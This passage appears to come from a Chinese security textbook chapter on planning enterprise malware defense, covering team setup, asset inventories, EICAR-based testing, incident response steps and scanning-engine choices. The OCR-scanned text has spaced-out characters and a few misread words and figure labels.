本 策略 可 以 作为 一 个 大 规模 企业 的 计算 机 安全 防御 体系 的 一 部 分 ,也 可 以 与 企业 已 有 
的 使 用 许可 制度 (Acceptable Use) 和 物理 安全 (Physical Security) 政 策 及 规章 相互 配合 。 


12.5.1 如 何 建立 防御 计划 


建立 恶意 代码 防御 计划 的 步骤 如 下 。 

1. 预算 的 管理 

不 管 恶 意 代 码 防 御 计划 是 否 有 效 或 有 效 性 是 否 高 , 它 都 会 花费 时 间 、 资 金 和 人 力 , 因 此 ， 
企业 在 决定 购买 相关 产品 之 前 需要 仔细 考虑 。 虽 然 成 功 打造 一 个 恶意 代码 防御 计划 令 人 非 
常 高 兴 , 但 如 果 因 为 资金 和 资源 不 足 而 使 计划 实施 半途 而 废 却 不 是 好 结果 。 对 于 一 个 良好 
的 防御 计划 ,可 从 以 下 几 点 进行 判断 。 

(1) 尽量 减少 费用 。 

(2) 保护 公司 的 可 信 性 。 

(3) 提高 最 终 用 户 对 计算 机 的 信心 。 

(4) 增加 客户 和 IT 人 员 的 信心 。 

(5) 降低 数据 损失 的 危险 性 。 

(6) 降低 信息 泄露 的 危险 性 。 

2. 精 选 一 个 计划 小 组 

为 了 使 计划 顺利 进行 ,还 需要 一 个 管理 维护 者 的 身份 ,因此 ,要 挑选 实现 防御 计划 所 
需要 的 人 员 , 同 时 指定 小 组 的 主要 领导 人 员 。 小 组 成 员 包 括 恶 意 代码 安全 顾问 、 程 序 员 、 
网 络 技 术 专 家 ,安全 成 员 , 甚 至 包括 终端 用 户 组 中 的 超级 用 户 。 小 组 成 员 的 多 少 依 赖 于 
企业 编制 的 大 小 ,但 要 注意 的 是 ,小 组 的 规模 要 尽量 小 ,以 便于 在 一 个 合理 的 时 间 内 进行 
有 效 管理 。 

3. 组 织 操 作 小 组 

操作 小 组 要 完成 的 工作 : 实现 相关 软 硬 件 机 制 来 防范 恶意 代码 的 解决 方案 ; 负责 方案 
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和 相关 软 硬 件 机 制 的 更 新 ; 应 急 处 理 等 。 

4. 制定 技术 编目 

在 启动 恶意 代码 防御 计划 前 ,必须 获得 企业 级 的 技术 编目 。 表 12-1 提供 了 一 个 基础 性 
的 技术 编目 列表 示例 。 在 列表 中 ,除了 要 注意 用 户 `.PC、 笔 记 本 电脑 .PDA、 文 件 服务 器 、 邮 
件 网 关 及 Internet 连接 点 的 数目 之 外 ,还 应 该 记录 操作 系统 的 类 型 .主要 的 软件 类 型 .远程 
位 置 和 广域网 的 连接 平台 。 通 过 以 上 所 有 的 数据 可 以 找到 企业 需要 保护 的 东西 。 最 终 的 解 
决 方案 也 必须 考虑 到 上 面 的 所 有 因素 。 


表 12-1 企业 计算 机 目录 


标示 信息 功能 /操作 系统 
序列 号 机 器 名 称 用 户 名 称 位 置 PC 服务 器 其 他 
PC-W-0001 Account-01 Account-01 AD Windows 98 
SE-W-0001 Server-01 Manager iD Win2K Server 
SE-W-0002 Server-02 Manager ITD Windows NT 4.0 
LI-L-0001 Linux Linux SD Linux 


5. 确定 防御 范围 

防御 范围 是 指 被 防御 对 象 的 范围 。 被 防御 用 户 可 能 包括 公司 办 公 室 、 区 域 办 公 室 、 远 程 
用 户 、 笔 记 本 电脑 用 户 、 客 户 机 等 。 计 算 机 平台 可 能 会 涉及 IBM 兼容 机 、Windows NT、 
Windows 3. x.DOS、Macintosh、UNIX、Linux、 文 件 服务 器 、 网 关 、 邮 件 服务 器 、Internet 边 
界 设备 等 。 整 个 计划 可 以 防御 所 有 的 计算 机 设备 或 仅 防御 那些 处 于 危险 环境 的 设备 。 不 论 
最 终 防 御 范围 如 何 ,都 必须 把 “范围 "文字 化 ,记录 在 文档 的 最 主要 部 位 。 

6. 讨论 和 编写 计划 

计划 需要 详细 描述 的 内 容 : 恶意 代码 防范 工具 所 部 署 的 位 置 及 需要 部 署 哪些 工具 , 防 
范 工具 所 保护 的 资产 ,防范 工具 如 何 部 署 以 及 何 时 、 如 何 进行 升级 工作 ,如 何 定义 一 个 通信 
途径 ,最 终 用 户 培训 以 及 处 理 突 发 事件 的 一 个 快速 反应 小 组 等 细节 问题 。 这 一 部 分 可 以 作 
为 最 终 计划 的 轮廓 。 在 整个 计划 中 ,需要 详细 说 明 恶 意 代码 防范 工具 的 使 用 和 部 署 ,以 及 对 
每 个 PC 进行 安全 部 署 的 步骤 。 

7. 测试 计划 

在 开始 大 范围 的 部 署 产品 之 前 ,应 该 在 测试 服务 器 和 工作 站 上 进行 试验 。 在 测试 环境 
下 ,如果 测试 成 功 , 就 可 以 开始 小 范围 的 部 署 产品 。 整 个 部 署 的 过 程 需 要 分 阶段 进行 。 首 先 
在 企业 的 一 个 比较 完整 的 部 门 部 署 ,然后 逐步 地 在 其 他 区 域 展 开 。 采 用 这 种 部 署 策略 可 以 
逐步 地 检验 并 修正 各 种 工具 。 如 果 不 进 行 测试 ,就 贸然 进行 大 范围 的 产品 部 署 , 可 能 会 出 现 
很 多 问题 并 带 来 很 大 损失 。 有 些 情 况 下 ,贸然 部 署 带 来 的 损失 甚至 要 远大 于 没有 任何 防护 
情况 下 恶意 代码 造成 的 损失 。 

8. 实现 计划 

虽然 讨论 和 编写 计划 非常 麻烦 ,但 是 实现 计划 更 加 麻烦 ,不 仅 需 要 投入 大 量 的 资金 人 
力 和 时 间 ,而 且 在 实现 计划 时 ,应当 选择 一 个 合适 的 顺序 ,并 根据 这 个 顺序 采 买 产品 ,逐步 部 
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署 系统 。 一 个 典型 的 顺序 是 ,首先 在 邮件 服务 器 或 文件 服务 器 部 署 恶 意 代码 防范 工具 ,然后 
在 终端 用 户 的 工作 站 上 进行 防范 工具 的 安装 和 部 署 工作 。 笔 记 本 电脑 和 远程 办 公 室 可 以 列 
入 第 二 批 考虑 的 范围 ,并 可 以 从 第 一 批 的 安装 部 署 中 获得 一 些 经 验 。 表 12-2 所 示 为 一 个 需 
要 维护 的 列表 ,其 中 列 出 了 资产 列表 中 需要 保护 的 条 目 。 经 过 集中 的 整理 ,就 不 会 漏 掉 任何 
计算 机 了 。 


表 12-2 更 改 检查 列表 


标示 信息 所 采取 的 保护 步骤 
序列 号 机 器 名 称 用 户 名 称 位 置 安装 桌面 AV PC 更 改 OS 补丁 
PC-W-0001 Account-01 Account-01 AD 用 全 
SE-W-0001 Server-01 Manager ITD 坚 下 P 
SE-W-0002 Server-02 Manager ITD 全 
LI-L-0001 Linux Linux SD 下 P 


9. 提供 质量 保证 测试 

计划 实现 之 后 ,需要 对 工具 和 过 程 进行 一 些 测试 。 首 先 ,检测 各 个 系统 的 恶意 代码 防范 
工具 是 否 正 在 工作 。 常 采用 的 方法 是 向 一 个 被 保护 的 系统 发 送 一 个 恶意 代码 测试 文件 ,或 
者 是 其 他 类 型 的 测试 ,不 要 使 用 那些 一 旦 失控 就 会 造成 大 范围 破坏 的 东西 去 测试 。 许 多 公 
司 都 使 用 EICAR? 测试 文件 。 然 后 ,对 软件 机 制 和 恶意 代码 数据 库 的 更 新 间 题 进行 测试 。 
最 后 ,在 整个 企业 范围 进行 弱点 测试 ,从 而 确认 防御 部 分 是 否 能 够 保护 它们 所 要 保护 的 所 有 
资产 。 

10. 保护 新 加 入 的 资产 

制定 一 些 策略 来 保护 新 加 入 的 计算 机 。 部 署 小 组 经 常 有 能 力 来 保护 那些 在 原始 计划 下 
定义 的 所 有 资产 ,但 是 一 个 月 后 总 是 忘 了 对 新 的 计算 机 进行 修改 。 对 新 加 入 的 计算 机 应 该 
进行 全 面 检测 ,从 而 保证 整个 企业 网 络 是 安全 的 。 

11. 对 快速 反应 小 组 的 测试 

恶意 代码 发 作 时 ,通常 会 用 到 快速 反应 小 组 。 通 过 一 个 预先 伪装 的 发 作 来 检测 快速 反 
应 小 组 。 这 给 了 所 有 人 一 个 机 会 来 练习 他 们 的 任务 ,检测 通信 系统 ,并 解决 所 有 问题 。 测 试 
演习 中 发 现 的 小 问题 如 果 没 有 得 到 解决 ,往往 就 会 长 期 存在 。 根 据 是 否定 期 复查 的 情况 ,用 
户 应 该 在 每 年 中 每 隔 一 段 时 间或 操作 改变 后 ,测试 一 下 有 关 小 组 。 

12. 更 新 和 复查 的 预定 过 程 

没有 什么 安全 计划 是 稳定 的 。 软 硬件 和 操作 系统 都 是 在 改变 的 。 用 户 行为 和 新 技术 都 
会 使 新 的 危险 出 现在 企业 环境 里 。 企 业 的 计划 应 该 被 视 为 是 一 个 “时 刻 更 新 的 文档 ”, 应 该 
预先 定义 定期 复查 的 过 程 ,并 且 对 它 的 成 效 性 进行 评估 。 当 新 的 危险 出 现 或 当 计划 开始 变 


@ EICAR( 反 病毒 测试 文件 ,www. eicar. org) 能 够 对 反 病 毒 软件 进行 有 限 测试 ,来 确认 反 病毒 软件 是 否 正在 运行 。 
这 个 文件 的 大 小 不 超过 68 字 节 , 绝 大 多 数 反 病毒 软件 供应 商都 认可 这 个 文件 的 有 效 性 。 许 多 组 织 每 天 把 EICAR 文件 
发 给 被 反 病 毒 软件 保护 的 服务 器 和 网 关 来 验证 操作 是 否 正 常 。 如 果 发 送 了 测试 文件 以 后 ,没有 得 到 报告 信息 ,管理 员 就 
知道 特定 的 服务 器 或 设备 没有 得 到 保护 。 
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得 落后 时 ,及 时 复查 就 应 该 开始 了 。 
12.5.2 执行 计划 


到 目前 为 止 ,小 组 已 经 组 建 , 相 关 的 环境 也 收集 好 了 ,该 是 制订 计划 的 时 候 了 。 亚 意 代 
码 防御 计划 应 该 填 括 所 有 恶意 代码 进入 企业 的 途径 。 绝 大 多 数 不 怀 好 意 的 程序 初次 进入 系 
统 都 是 通过 电子 邮件 系统 的 。 可 是 ,普通 病毒 .蠕虫 和 木马 也 可 以 通过 磁盘 文件 .Internet 
下 载 .即时 消息 客户 端 软件 进入 到 系统 。 很 久 以 前 ,扫描 插入 的 磁盘 及 禁止 软盘 启动 就 可 以 
达到 封锁 恶意 代码 和 人 口 的 功能 。 但 今天 ,用 户 需要 考虑 磁盘 (U 盘 、 移 动 硬盘 )、Internet、 邮 
件 \ 笔 记 本 电脑 .PDA、 远 程 用 户 ,以 及 其 他 允许 数据 或 代码 进入 保护 区 的 所 有 因素 ,如 
图 12-4 所 示 。 


Ep 宏 病 毒 即时 消息 电子 邮件 
| 
] | 
| | 
FTP 被 共享 用 户 
保 
护 
系 
RE 统 来 自 MMC 的 病毒 
次 骗 性 警告 “一 | | 
尖山 性 和 (维护 人 员 ) 
浏览 器 攻击 PDA 与 移动 设备 | “| 来 自 厂商 的 软件 远程 用 户 


图 12-4 潜在 的 恶意 代码 进入 点 


很 多 企业 外 部 计算 机 和 网 络 通常 和 企业 内 部 受 保护 的 资源 是 相互 连接 的 。 如 果 考 虑 到 
其 他 企业 公司 的 计算 机 相互 感染 的 问题 ,平等 的 解决 方案 就 是 他 们 也 采用 相同 的 尺度 来 降 
低 感染 区 域 的 可 能 性 。 厂 商 、 第 三 方 .与 外 部 计算 机 或 网 络 有 连接 的 商业 伙伴 都 需要 遵循 一 
个 最 低 标准 的 规定 ,并 签署 一 个 文件 以 证 明 他 们 理解 了 有 关 的 规定 。 有 时 ,公司 防御 计划 中 
的 做 法 和 采用 的 工具 可 以 被 外 界 的 计算 机 和 网 络 所 参考 ,或 者 作为 对 已 使 用 的 反 恶 意 代码 
软件 进行 升级 的 范例 。 

1. 计划 核心 

以 下 提 到 的 3 个 目标 就 是 整个 防御 计划 的 基石 。 

(1) 使 用 值得 信赖 的 反 亚 意 代 码 扫描 引擎 。 

(2) 调整 PC 环境 以 阻止 恶意 代码 的 传播 。 

(3) 使 用 其 他 的 工具 来 提供 一 个 多 层 的 防御 。 

使 用 一 个 可 靠 、 最 新 的 恶意 代码 扫描 引擎 是 整个 计划 的 基石 。 恶 意 代 码 扫描 引擎 在 通 
过 检测 和 清除 恶意 代码 来 实现 保护 计算 机 方面 是 很 成 功 的 ,每 一 个 公司 都 应 该 使 用 它 。 可 
是 ,今天 纯粹 依赖 于 恶意 代码 扫描 引擎 则 是 一 个 错误 。 历 史 一 次 次 地 证 明 ,扫描 引擎 无 法 也 
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永远 无 法 阻止 所 有 的 恶意 代码 人 侵 。 用 户 必 须 假定 恶意 代码 可 以 通过 其 恶意 代码 防御 系 
统 , 并 采取 措施 来 降低 它 的 传染 性 。 如 果 做 得 正确 ,在 那些 得 到 保护 的 PC 上 ,恶意 代码 就 
不 会 发 作 。 最 后 ,应 该 考虑 其 他 的 防御 和 检测 工具 来 保护 用 户 的 环境 ,并 迅速 跟踪 相关 的 
漏洞 。 

2. 软件 部 署 

计划 中 应 该 详细 地 列 出 实现 政策 和 过 程 所 需 的 人 力 资源 。 通 常 来 说 ,在 部 署 所 有 的 工 
具 时 ,需要 通过 多 种 技巧 才能 够 取得 同等 的 效果 。 网 络 管理 员 需 要 在 文件 和 邮件 服务 器 上 
测试 和 安装 软件 。 调 整 本 地 工作 站 需要 烦琐 的 技术 工作 (除非 对 部 属 工具 非常 精通 )。 需 要 
估计 出 每 个 人 花费 在 测试 和 安装 软件 上 的 时 间 , 并 建立 一 个 部 署 进度 表 。 

3. 分 布 式 更 新 

一 旦 恶意 代码 防御 工具 配置 完毕 ,如 何 保证 它们 的 更 新 呢 ? 许多 反 恶 意 代码 工具 允许 
通过 中 央 服 务 器 来 下 载 更 新 包 , 并 将 更 新 包 发 往 当 地 的 工作 站 。 工 作 站 的 调整 必须 一 次 次 
地 手动 配置 ,或 者 使 用 中 央 登 录 脚 本 、 脚 本 语言 、 批 处 理 文件 .微软 SMS 来 完成 。 尽 管 这 些 
方式 有 助 于 对 分 布 工 具 进 行 自动 升级 ,但 还 需要 对 大 的 更 新 进行 手工 测试 。 拥 有 多 种 台 
机 和 大 型 局 域 网 的 大 型 组 织 可 以 采用 多 种 升级 方式 ,其 中 包括 自动 分 布 工具 .CD-ROM 、 磁 
盘 、 映 射 驱 动 器 和 FTP 等 ,也 可 以 使 用 适合 于 自己 计算 机 环境 的 工具 。 同 样 ,对 于 那些 具有 
支配 地 位 的 人 们 (包括 雇员 和 最 终 用 户 ) ,也 需要 对 更 新 负 有 责任 。 但 是 ,总 是 有 一 些小 组 负 
责 人 或 部 门 经 常 忘记 更 新 。 

4. 沟通 方式 

防御 计划 的 核心 就 是 通信 。 当 恶意 代码 发 作 时 ,最 终 用 户 和 自动 报警 系统 会 提醒 防御 
小 组 的 成 员 。 小 组 成 员 需 要 相互 联系 从 而 召集 队伍 。 小 组 领导 者 需要 提醒 管理 者 。 小 组 中 
的 某 些 人 被 指定 负责 企业 和 防 恶 意 代码 厂商 进行 联系 工作 。 事 先 需 要 定义 一 个 指挥 系统 ， 
从 而 保证 把 最 新 的 状态 从 小 组 发 往 每 一 个 独立 的 最 终 用 户 。 

在 一 个 典型 的 计划 中 ,应 明确 地 制定 任务 和 责任 ,并 建立 一 个 反馈 机 制 ,每 一 个 应 付 突 
发 危机 事件 的 小 组 成 员 ( 快 速 反 应 小 组 ) 都 会 分 别 负 责 与 特定 的 部 门 或 分 区 领导 之 间 的 联系 
工作 ,使 得 最 终 用 户 和 部 门 可 以 和 小 组 取得 联系 。 被 联系 的 部 门 领导 对 他 管理 下 的 雇员 负 
有 责任 。 

5. 最 终 用 户 的 培训 

虽然 编写 了 计划 ,但 是 那些 最 终 用 户 有 可 能 忽略 这 些 预 先 提出 的 建议 。 最 好 对 最 终 用 
户 做 一 个 集体 通知 和 培训 。 培 训 应 该 包括 对 恶意 代码 领域 的 简要 概括 ,并 讨论 普通 病毒 、 蠕 
虫 \ 木 马 、 恶 意 邮 件 和 不 怀 好 意 的 Internet 代码 。 用 户 应 该 意识 到 ,从 Internet 下 载 软件 、 安 
装 好 看 的 屏幕 保护 和 运行 好 笑 的 执行 文件 都 是 很 危险 的 事情 。 培 训 材料 应 该 谈 到 相关 的 危 
险 , 以 及 公司 为 了 降低 这 些 危险 所 做 的 努力 ,包括 每 一 个 员工 为 了 降低 恶意 代码 传播 的 可 能 
性 而 做 出 的 努力 。 

需要 让 最 终 用 户 了 解 ,只 有 通过 认证 的 软件 才 可 以 安装 到 公司 的 计算 机 上 。 软 件 不 能 
从 网 上 下 载 ,不 可 以 从 家 里 带 来 ,也 不 能 根据 以 前 没有 认证 但 是 安装 成 功 的 例子 而 进行 。 用 
户 需 要 被 告知 ,一旦 恶意 代码 发 作 就 需要 向 合适 的 负责 人 或 部 门 报告 ,并 被 告知 破坏 纪律 会 
带 来 惩罚 性 的 处 理 。 用 户 需要 签署 一 个 表格 以 证 明 他 们 对 规定 的 理解 。 该 表格 将 被 收入 雇 
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员 个 人 记录 中 。 

6. 应 急 响 应 

每 个 计划 都 需要 制定 小 组 成 员 面 对 恶意 代码 发 作 时 应 采取 的 措施 。 通 常 来 说 ,配置 好 
的 防御 工具 会 保护 用 户 的 环境 ,但 是 偶尔 有 新 的 恶意 代码 会 绕 过 防御 设施 或 一 个 未 受 保护 
的 计算 机 ,并 将 一 个 已 知 的 威胁 到 处 传播 。 另 外 ,还 有 一 个 普遍 的 问题 : 计划 需要 说 明 如 何 
处 理 多 个 恶意 代码 感染 同时 发 作 的 问题 ,并 且 同 时 报告 快速 反应 小 组 。 以 下 就 是 面 对 一 次 
恶意 代码 事故 需要 考虑 的 步骤 。 

1) 向 负责 人 报告 事故 

不 管 问题 的 发 作 是 如 何 被 人 第 一 次 发 现 的 ,第 一 个 知道 问题 的 小 组 成 员 都 应 该 向 小 组 
负责 人 报警 ,并 且 向 其 他 小 组 成 员 通 报 。 ER 
码 的 干扰 。 例 如 ,小 组 成 员 按照 常规 采用 了 通过 Internet 邮件 向 其 他 小 组 成 员 发 送 紧 急 记 
录 , 而 邮件 网 关 可 能 已 经 被 恶意 代码 破坏 了 。 小 组 人 员 在 发 现 邮件 威胁 已 经 出 现时 ,会 通过 
电话 、 手 机 等 人 工 通 知 或 者 通过 基于 HTML 的 邮件 来 通知 相关 成 员 。 

2) 收集 原始 资料 

赶 到 的 小 组 成 员 应 注意 收集 资料 ,并 相互 共享 所 知道 的 恶意 代码 的 相关 信息 ,以 得 
到 对 恶意 代码 的 概要 性 了 解 。 例 如 : 它 是 通过 邮件 传播 的 吗 ? 哪儿 最 先 出 现 问题 ? 已 经 
开始 传播 了 多 久 ? 它 会 修改 本 地 文件 系统 吗 ? 它 属于 哪 一 种 恶意 代码 ? 它 是 用 什么 语 
言 编 写 的 ? 

3) 最 小 化 传播 

完成 了 最 初 的 资料 收集 以 后 ,小 组 人 员 应 该 很 快 采取 步骤 以 使 恶意 代码 的 传播 速度 最 
小 化 。 如 果 是 邮件 蠕虫 ,可 以 关闭 邮件 服务 器 或 阻止 来 自 Internet 的 访问 。 如 果 恶 意 代 码 
已 经 修改 或 破坏 了 文件 服务 器 上 的 文件 , 则 应 断 开 用 户 的 连接 并 关闭 登录 。 如 果 攻 击 很 严 
重 , 可 以 考虑 关闭 相关 的 服务 器 和 工作 站 ,也 可 以 不 关闭 服务 器 而 进行 恶意 代码 清除 工作 ， 
但 是 会 花费 更 多 的 时 间 。 如 果 面 对 一 个 相似 的 环境 ,用 户 应 该 让 高 级 管理 人 员 来 确定 是 不 
是 需要 最 小 化 关机 时 间或 最 小 化 服务 中 断 时 间 。 此 外 ,确认 用 户 拥有 服务 器 和 服务 关闭 的 
有 关 记 录 , 从 而 可 以 很 快 地 恢复 服务 。 

4) 让 最 终 用 户 了 解 最 新 的 危险 

在 入 口 处 和 公共 场合 张贴 关于 问题 和 用 户 应 该 做 些 什 么 的 署名 告示 ,将 是 一 个 通知 用 
户 的 比较 好 的 途径 。 如 果 亚 意 代码 已 经 从 用 户 的 公司 传播 到 其 他 公司 了 ,注意 尽量 与 他 们 
进行 沟通 。 例 如 ,感染 邮件 蠕虫 ,虽然 用 户 可 以 通过 邮件 发 送 一 个 报警 通知 ,但 是 通常 来 不 
及 阻止 它们 。 

发 现 问 题 时 ,不 应 该 只 通知 那些 受到 感染 的 部 门 , 还 要 通知 那些 没有 被 感染 的 部 门 。 没 
有 感染 的 部 门 可 以 监测 传播 的 先兆 ,并 且 和 警告 他 们 的 用 户 不 要 打开 特定 的 邮件 等 。 

让 最 终 用 户 了 解 此 时 正在 处 理 问题 , 当 可 以 安全 地 使 用 特定 的 服务 和 服务 器 时 ,会 和 他 
们 联系 。 同 样 也 要 通知 管理 层 . 让 他 们 知道 事态 的 进展 情况 。 

5) 收集 更 多 的 事实 

到 目前 为 止 ,小 组 成 员 在 一 定 意义 上 控制 了 恶意 代码 的 传播 和 破坏 ,并 采取 了 步骤 阻止 
更 大 的 危害 。 快 速 反应 小 组 应 该 收集 信息 并 讨论 问题 ,并 把 新 的 恶意 代码 交 到 反 恶 意 代码 
软件 公司 进行 分 析 。 
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查 清楚 谁 没有 感染 和 谁 被 感染 是 一 样 重要 的 。 如 果 一 个 部 门 除了 一 台 计 算 机 外 都 被 感 
染 了 , 则 可 以 找 出 使 用 这 台 计 算 机 的 人 到 底 做 过 什么 (如 打开 感染 了 的 邮件 )。 也 许 就 是 特 
定 的 工作 站 上 面 的 一 个 组 件 阻 止 了 恶意 代码 的 传播 。 如 果 防 御 工 具 本 来 可 以 挡住 恶意 代 
码 , 就 需要 搞 清楚 为 什么 它 可 以 通过 防御 。 

确认 具体 的 损失 。 它 到 底 传播 了 多 远 ? 多 少 台 PC 受到 感染 ? 多 少 部 门 受 到 影响 ? 恶 
意 代 码 对 计算 机 做 了 些 什么 ? 它 到 底 有 没有 删除 其 他 文件 ,重新 命名 文件 ? 覆盖 文件 ? 修 
改 注册 表 ? 或 者 在 启动 文件 中 加 入 了 别 的 东西 ? 可 以 通过 PC 的 Find>Files or Folders 来 
查找 最 近 有 哪些 文件 发 生 了 改动 。 如 果 受 到 恶意 代码 或 蠕虫 攻击 ,一 般 会 立刻 发 现 有 可 疑 
的 文件 出 现 。 通 常会 在 多 个 启动 区 域 检查 是 否 有 可 疑 的 变化 。 然 后 用 NETSTAT -A 来 检 
查 可 疑 的 Internet 连接 。 一 旦 发 现 了 可 疑 文件 ,可 以 和 小 组 其 他 成 员 在 其 他 计算 机 上 发 现 
的 东西 进行 比较 : 程序 是 不 是 一 直 在 做 同样 的 事情 ? 每 次 修改 的 文件 是 不 是 有 着 同样 的 名 
称 ? 被 感染 的 邮件 是 不 是 有 着 同样 的 主题 ?计算 机 之 间 的 系统 的 修改 是 不 是 一 样 的 ? 收集 
这 些 证 据 的 所 有 记录 。 如 果 可 能 ,可 以 让 小 组 中 的 相关 人 员 对 恶意 代码 进行 进一步 的 分 
析 。 任 何 一 个 程序 员 都 可 以 读 懂 并 至 少 在 一 定 程度 上 理解 当前 很 多 的 基于 VBScript 的 
蠕虫 源 代码 。 但 是 没有 来 自 反 恶 意 代码 软件 商 的 帮助 ,一 般 无 法 100% 理 解 恶意 代码 的 
所 作 所 为 。 

6) 制定 并 实现 一 个 最 初 的 根除 计划 

用 所 学 的 东西 实现 一 个 有 秩序 的 根除 计划 。 例 如 ,对 于 绝 大 多 数 邮件 蠕虫 ,首先 删除 所 
有 的 受 感染 的 邮件 (Microsoft Exchange 服务 器 上 的 EXMERGE 就 是 一 个 较 好 的 工具 )。 
最 好 删除 或 替换 那些 被 损坏 或 感染 了 的 文件 。 可 疑 的 文件 应 该 移动 到 一 个 隔离 区 域 中 ,以 
方便 随后 的 分 析 。 通 过 使 用 中 央 登 录 脚 本 ,可 以 启用 批 处 理 文 件 来 查找 恶意 代码 ,并 从 PC 
上 删除 它们 及 修复 毁坏 的 文件 。 

可 以 考虑 在 清除 以 前 做 一 个 受害 系统 的 完全 备份 ,从 而 为 以 后 的 分 析 做 好 准备 。 确 保 
那些 好 心 的 技术 人 员 不 会 删除 那些 恶意 代码 的 所 有 备份 ,车 没有 留 下 任何 东西 就 无 法 分 析 
恶意 代码 的 所 作 所 为 。 删 除 所 有 恶意 代码 的 备份 只 会 使 清除 工作 更 加 复杂 。 

首先 ,始终 在 一 套 测 试用 的 计算 机 上 运行 清除 程序 ,以 保证 清除 程序 不 会 造成 更 多 的 损 
失 。 其 次 ,在 少数 不 同 区 域 中 的 普通 计算 机 上 运行 清除 程序 。 然 后 ,验证 恶意 代码 程序 已 经 
被 彻底 清除 ,再 也 没有 新 的 损失 了 。 只 有 这 个 时 候 , 才 可 以 把 该 清除 程序 公 诸 于 众 。 通 过 预 
先 设 定 的 通信 机 制 来 警告 最 终 用 户 并 额外 提供 有 用 的 建议 。 

7) 验证 根除 工作 正在 进行 

派出 操作 小 组 中 的 成 员 来 验证 最 终 用 户 的 计算 机 已 经 彻底 地 得 到 清理 ,并 监视 通信 通 
道 来 查找 问题 。 有 时 在 这 个 时 候 会 发 现 当初 在 早期 分 析 时 小 组 没有 注意 到 的 东西 。 如 果 有 
这 样 的 问题 存在 ,清除 程序 应 该 进行 合适 的 调整 ,并 再 次 发 放 给 所 有 的 受 感染 的 用 户 。 将 清 
除 工 作 的 情况 向 操作 人 员 和 最 终 用 户 进行 通报 。 

8) 恢复 关闭 的 系统 

在 系统 清除 完毕 后 ,就 可 以 把 关闭 的 系统 再 次 启动 了 。 系 统一 旦 启动 ,用 户 就 会 很 快 开 
始 登 录 系 统 。 根 据 当 初 记录 的 禁止 系统 名 单 , 就 可 以 知道 需要 启动 哪些 东西 。 去 掉 那 个 关 
于 警告 用 户 有 关 事 项 的 通告 .并且 通知 用 户 可 以 按照 正常 的 程序 登录 了 ,并 告知 是 否 还 有 其 
他 没有 启动 的 系统 。 
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9) 为 恶意 程序 的 再 次 发 作 做 好 准备 

为 恶意 代码 的 再 次 发 作 做 好 准备 ,并 把 此 事 告知 最 终 用 户 。 通 常情 况 下 ,发 现 最 初 攻击 
问题 所 花 的 时 间 越 长 ,问题 就 越 容 易 再 次 发 生 。 在 早期 DOS 引导 恶意 代码 的 时 代 , 公 司 发 
现 计算 机 被 感染 时 通常 已 经 是 几 个 月 到 一 年 以 后 。 而 到 那个 时 候 , 感 染 的 磁盘 已 经 在 公司 
广泛 流传 ,直至 再 次 发 作 。 邮 件 蠕 虫 也 是 一 样 的 道理 ,发 现 得 越 早 ,它们 就 越 不 易 传 播 得 
更 远 。 

10) 确认 公众 关系 的 影响 

这 里 必须 考虑 恶意 代码 发 作 带 给 最 终 用 户 、 公 司 .操作 员 、 外 界 消费 者 和 商务 伙伴 的 影 
响 。 如 果 恶 意 代 码 从 用 户 的 公司 传播 到 其 他 公司 ,该 是 写 道歉 信 的 时 候 了 。 要 确认 问题 是 
否 已 经 解决 ,并 阻止 问题 的 再 次 发 生 。 提 醒 那些 需要 提醒 的 代理 商 , 并 且 决定 是 否 需要 采取 
法 律 措施 。 如 果 有 新 闻 媒 体 来 采访 ,也 需要 考虑 一 下 公众 关系 的 反应 ,计划 中 应 该 准备 相关 
的 说 明 。 

11) 做 一 次 更 加 深入 的 分 析 

危机 解决 后 ,可 以 做 一 次 更 加 深入 的 分 析 。 在 这 个 时 候 ,应 该 对 恶意 代码 程序 的 所 作 所 
为 有 了 一 个 全 面 的 了 解 。 不 管 是 应 急 小 组 分 析 程 序 还 是 反 恶 意 代 码 软 件 公 司 做 出 的 结论 ， 
都 应 该 进行 深入 的 分 析 来 解决 企业 的 损失 。 防 御 计划 或 工具 是 不 是 存在 恶意 代码 传播 的 漏 
洞 , 是 不 是 已 经 得 到 了 解决 ? 把 相关 的 问题 做 成 文档 也 是 有 帮助 的 ,诸如 为 什么 这 种 恶意 代 
码 会 比 其 他 的 恶意 代码 传播 得 更 加 广泛 等 。 这 些 问题 有 助 于 把 计划 修改 得 更 加 完善 。 在 将 
来 的 预算 中 ,可 以 使 用 收集 的 统计 资料 作为 尺度 对 安全 计划 的 花费 和 影响 进行 调整 。 


12.5.3 恶意 代码 扫描 引擎 相关 问题 


恶意 代码 扫描 引擎 的 基本 功能 就 是 详细 地 检查 目标 文件 ,并 且 和 已 知 的 恶意 代码 数据 
库 进行 比较 。 和 良好 的 恶意 代码 扫描 引擎 的 特征 包括 速度 \ 准 确 性 、 稳 定性 、 透 明度 、 运 行 平 
台 、 用 户 可 定制 性 、 自 我 保护 ,扫描 率 、 磁 盘 急 救 、 自 动 更 新 、 技 术 支 持 、 日 志 、 通 知 、 处 理 邮 件 
的 能 力 .前瞻 性 研究 和 企业 性 能 。 决 定 是 否 运行 恶意 代码 扫描 引擎 不 是 一 件 费 脑筋 的 事情 ， 
决定 所 要 运行 的 位 置 就 是 一 个 难题 了 。 恶 意 代码 扫描 引擎 可 以 运行 在 台式 机 、 邮 件 服务 器 、 
文件 服务 器 和 Internet 边界 设备 上 。 下 面 是 一 些 在 部 署 恶意 代码 扫描 引擎 前 需要 考虑 的 
问题 。 

1. 何 时 进行 扫描 

如 果 在 一 个 文件 服务 器 或 台式 机 上 配置 了 扫描 软件 ,就 需要 做 出 一 个 何 时 扫描 文件 的 
决定 ,一 般 有 以 下 几 种 。 

(1) 实时 扫描 因为 任何 原因 访问 到 的 文件 。 

(2) 定时 扫描 。 

(3) 按 需 扫描 。 

(3) 只 扫描 进入 的 新 文件 。 

很 多 扫描 程序 允许 扫描 因为 任何 原因 访问 文件 ,包括 进入 的 新 文件 .出 去 的 文件 ,文件 
副本 .打开 或 移动 的 文件 。 尽 管 这 是 最 安全 的 选择 ,但 扫描 所 有 因为 任何 理由 访问 到 的 文件 
会 造成 明显 的 性 能 下 降 。 曾 经 见 到 过 这 种 情况 , 当 恶 意 代码 扫描 引擎 启动 了 这 个 功能 后 , 工 
作 站 的 性 能 因而 降低 了 300% 。 一 次 又 一 次 扫描 同一 个 旧 的 应 用 程序 文件 ,每 一 次 程序 启 
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动 都 只 会 带 来 很 少 的 好 处 ,这 将 造成 明显 的 性 能 下 降 。 

一 些 管 理 员 意识 到 ,随时 扫描 所 有 的 文件 会 造成 性 能 大 幅度 的 下 降 , 取 而 代 之 的 是 定义 
